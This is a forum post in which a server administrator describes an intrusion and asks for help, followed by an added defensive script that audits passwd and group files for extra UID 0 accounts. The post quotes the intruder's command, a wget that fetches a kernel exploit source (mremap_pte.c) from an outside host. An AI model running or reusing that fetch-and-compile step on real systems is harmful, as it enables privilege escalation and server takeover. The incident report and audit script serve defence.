I Caught A Hacker - how do I hammer this guy?

Hi,
I had a recent signup and our Fraud protection gave a blank result for all aspects it checks - basically the IP was unknown. So I decided to allow the account to be created - BIG MISTAKE.

Within the next few hours the server was hacked. I managed to lock him out again - terminated his account, removed all his (0) UID created users and groups etc. I totally disabled telnet and changed ssh settings. So I feel fairly confident I've locked him out now. Anyway, I wanted to know exactly what he did, so I did a search for all the .bash_history files - his came up and I had a look at it:
He went straight into uploading an exploiter (root kit) and installed it and bang, erased everything in his account and that was it. Now I'm wondering - has he set the server up for something bad in the coming days - anyway it doesn't matter, I'm having the server cancelled in a day's time and am setting up a new server now.
But here's what he uploaded via ftp:
wget http://www.web-hack.ru/exploit/source/mremap_pte.c

He then compiled it and the server's been stuffed ever since. Question - is this a kernel crack - meaning a serious one? Has anyone had experience with this before?

Anyway I have all his details - although they are prob all false - but I have his IP and the username he signed up with was smurfas

Anyone got any suggestions how I deal with this from now? I'd love to get this guy caught - do I have enough info?

Also, should I be doing anything else to the server right now? What does this mremap_pte.c do?

Help much appreciated
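
The post mentions removing the UID 0 users and groups the intruder created. As an added example (not part of the original post), this shell script shows one way to list any accounts that still hold superuser UID or GID 0; the function names are hypothetical and the passwd/group contents are constructed sample data.

```shell
#!/bin/sh
# Added example: audit passwd/group data for extra superuser accounts.
# All sample data below is constructed for illustration.

# Print every account name with UID 0 other than "root".
uid0_accounts() {
    awk -F: '$1 !~ /^#/ && $3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print non-root users that belong to a GID 0 group, either as their
# primary group (passwd field 4) or as a listed member (group field 4).
gid0_members() {
    {
        awk -F: '$4 == 0 && $1 != "root" { print $1 }' "$1"
        awk -F: '$3 == 0 && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "root") print m[i]
        }' "$2"
    } | sort -u
}

# Constructed sample files (not taken from the server in the post).
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
webuser:x:1001:1001::/home/webuser:/bin/bash
sysadm:x:0:0::/tmp:/bin/bash
backup2:x:1002:0::/home/backup2:/bin/bash
EOF
cat > "$SAMPLE_DIR/group" <<'EOF'
root:x:0:root,helper
daemon:x:1:
webuser:x:1001:
EOF

echo "UID 0 accounts besides root:"
uid0_accounts "$SAMPLE_DIR/passwd"
echo "Non-root members of GID 0 groups:"
gid0_members "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/group"
```

On a live system the same functions take `/etc/passwd` and `/etc/group` as arguments; after a suspected kernel-level compromise the output is only trustworthy when the files are read from a clean environment, such as a rescue boot.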

 

 

 

 
